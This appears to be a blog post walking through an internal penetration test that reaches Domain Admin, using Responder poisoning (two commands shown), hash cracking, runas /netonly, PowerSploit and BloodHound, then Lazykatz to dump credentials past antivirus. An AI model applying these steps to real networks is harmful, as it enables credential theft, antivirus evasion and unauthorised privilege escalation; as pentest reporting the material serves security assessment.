Compromising Domain Admin in Internal Pentest

Following blog post is nothing but a copy of actual post from my friend‘s post on getting domain admin in internal penetration testing. It is very simple and easy to understand so thought of putting it on my website.

First tool of choice is Responder with Analyze mode. This mode allows you to see NBT-NS, BROWSER, LLMNR, DNS requests on the network without poisoning any responses, in simple words perform passive reconnaissance for you.
root@kali: python Responder.py -I eth1 -A
Responder for passive scanning

Responder for passive scanning

From above screen we can say, the network looks vulnerable to LLMNR and NBT-NS poisoning. Firing up the Responder with respective flags we captured the hashes of users over the network.
root@kali: python Responder.py -I eth1 -Pbv

Responder with respective flags

Responder with respective flags

Yay.. we got some cleartext credentials of the users using WPAD flag (-w). But most of them were normal internal users, continued running Responder on the network we captured hash of Servicedesk account.

continued running Responder

continued running Responder

Then we cracked the hash using Hashcat with aid of dictionary file. Now its time to abuse the cracked Servicedeskcredentials to dig more in the infrastructure. So using the trick explained by @sixdb in article we used /netonly flag with runas.exe. This allowed us to launch cmd.exe running in context of domain user (Servicedesk) from non-domain joined system.

using /netonly flag

using /netonly flag

Once connected you can run various tools, like we used Powersploit to dump more information about Domain being authenticated user. We enumerated information about Domain Controllers and Domain Admins in the infrastructure.

enumerated information about Domain Controllers and Domain Admins

enumerated information about Domain Controllers and Domain Admins

enumerated information about Domain Admins

enumerated information about Domain Admins

Now we need to find the path to compromise the Domain Admin account, for this we used BloodHound. It aids us to reveal the hidden and often unintended relationships within an Active Directory environment in turn expediting the escalation process.

turn expediting the escalation process

turn expediting the escalation process

Bloodhound generates 3 csv for visualization.

CSV files

CSV files

Using visualization generated using Bloodhound we found “Shortest Path to Domain Admins”.

Visualization of "Shortest Path to Domain Admins"

Visualization of “Shortest Path to Domain Admins”

The generated graph shows the no. of hops required to reach machine where Domain Admin is logged-in. Hence using cmd.exe access we can run Invoke-Mimikatz.ps1 to dump credentials from first hop server. But now days all AV engines flag these scripts.

Virustotal scan result

Virustotal scan result

So in order bypass AV detection we used Lazykatz. Its automation developed to extract credentials from remote targets protected with AV and/or application whitelisting software, developed on top of @subtee work.

Running the Lazykatz using Servicedesk account against first hop server, we got clear text credentials of one of the member of Domain Admin group. Using those credentials we added our user to Domain Admin group.

Finally, we are member of Domain Admin group. Happy Hunting.

Posted in Hacking, Operating System, Security Tagged with: , , ,